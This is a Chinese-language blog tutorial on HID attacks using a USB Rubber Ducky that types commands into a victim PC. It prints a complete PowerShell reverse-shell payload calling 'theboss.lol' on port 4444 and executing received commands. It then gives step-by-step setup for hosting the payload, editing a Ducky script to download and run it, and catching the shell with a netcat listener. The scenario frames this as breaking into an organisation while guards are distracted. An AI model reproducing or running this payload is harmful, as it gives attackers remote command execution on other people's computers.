渗透测试
首先 我们先不谈什么什么攻击 首先想象你是一名渗透测试专家 你准备来到一个机构进行渗透测试 你的目标是黑入一台初级的主机 你尝试过使用线上社会工程学攻击 但是没有效果 而你的队友可以通过伪造无线电限号来吸引保安20秒 这时 你会怎么做?

  1. 把主机搬回家
  2. 藏在柜子里等他们下班
  3. 利用HID攻击 三秒内获得一个Netcat回连

哈哈 想必答案我也不用说了吧 那么现在我们来学习下HID攻击吧


0x01 什么是HID攻击?

这里 我们可以借鉴微软的一篇关于HID的文章
微软文章
(其实不用看啦)

人体学接口设备 (HID) 是一个设备类定义,用于将 PS/2 样式的连接器替换为支持 HID 设备(例如键盘、鼠标、游戏控制器等)的通用
USB 驱动程序。在 HID 之前,设备只能对鼠标和键盘使用严格定义的协议。
硬件创新要求使用现有协议重载数据,或使用其自己的专用驱动程序创建非标准硬件。 HID
为这些“启动模式”设备提供了支持,同时通过可扩展、标准化且易于编程的接口添加对硬件创新的支持。
hid设备

其实简单的来说HID设备就是键盘这种输入设备 而HID攻击呢,其实就是指利用模拟键盘的输入进行的攻击
其实 如果你插入一个键盘 然后你设置了个宏之类的东西 这也叫HID攻击


0x02 啥是Netcat

不会吧不会吧 都1202年了还有人不知道啥是Netcat吧

Netcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。内建有很多实用的工具。
比如一个简单的例子 我在netcat监听端Root@Jali:nc -l -p 8080 之后在服务端root@Kali: nc 192.168.1.2 8080
这时 就会有一个Shell回来


0x03 W1cky Time:)

这次我们需要的是一个叫做Rubberducky的设备 在某宝和Hak5[老熟人了]上都有买 只是价格有点贵。。。当然 如果你有时间的话可以叫代购或者ebay上买一下,都是可以的
Hak5的Rubberducky
这样一个
你的设备都购买到后 你就要开始的的准备工作了
首先 除了Rubberducky和Netcat,你还需要一个可以远程下载文件的公网服务器(光有服务器不行 要域名等)或者你可以找那种不用输密码就可以访问资源的网盘(Johnw1ck私有云服务你值得拥有!!

之后 你需要访问Github的一个地址 来获得你需要的东西 github地址
这里 有很多文件 你需要下载的只有Payload.ps1Rubber ducky Reverse shell文件
payload.ps1是这样的(你可以自己复制)

$sm=(New-Object Net.Sockets.TCPClient('theboss.lol',4444)).GetStream();[byte[]]$bt=0..65535|% 
{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object 
Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d  
2>&1));$sm.Write($st,0,$st.Length)}

之后 首先你要把payload.ps1上传到你的服务器上 并把里面的 TCPClient('theboss.lol',4444)) 这里的 theboss.lol修改成你的ip(公网)或者你的网址 你也可以把4444改成你自定义的端口
之后 你所以服务器上的配置就都完成了 接下来就是硬件配置了
首先 把Rubberducky上的Microsd卡拔出来 插入你的电脑中 之后打开https://www.ducktoolkit.com/encode#这个网址 你就可以开始编写了(你不用编写)
duckytoolkit
现在 你可以打开Rubber ducky Reverse shell文件 并把这里的东西全部都复制在编写器里面把第18句里面的DownloadString('http://theboss.lol/payload.ps1')改成你自己的payload.ps1下载地址
之后点击
encode后 把payload.bin上传到你的Microsd上 在把microsd插回去, 再在你的公网ip服务器上输入(你要下载netcat)nc -lp 4444一切就就绪了
这时 如果你都做好了准备 插入Rubberducky 就会自动输入一个powershell指令!!
之后 再在公网服务器中等待:
5
4
3
2
1
Bingo!你获得了一个netcat回连!!


最后修改:2021 年 04 月 07 日 05 : 34 PM
如果觉得我的文章对你有用,请随意赞赏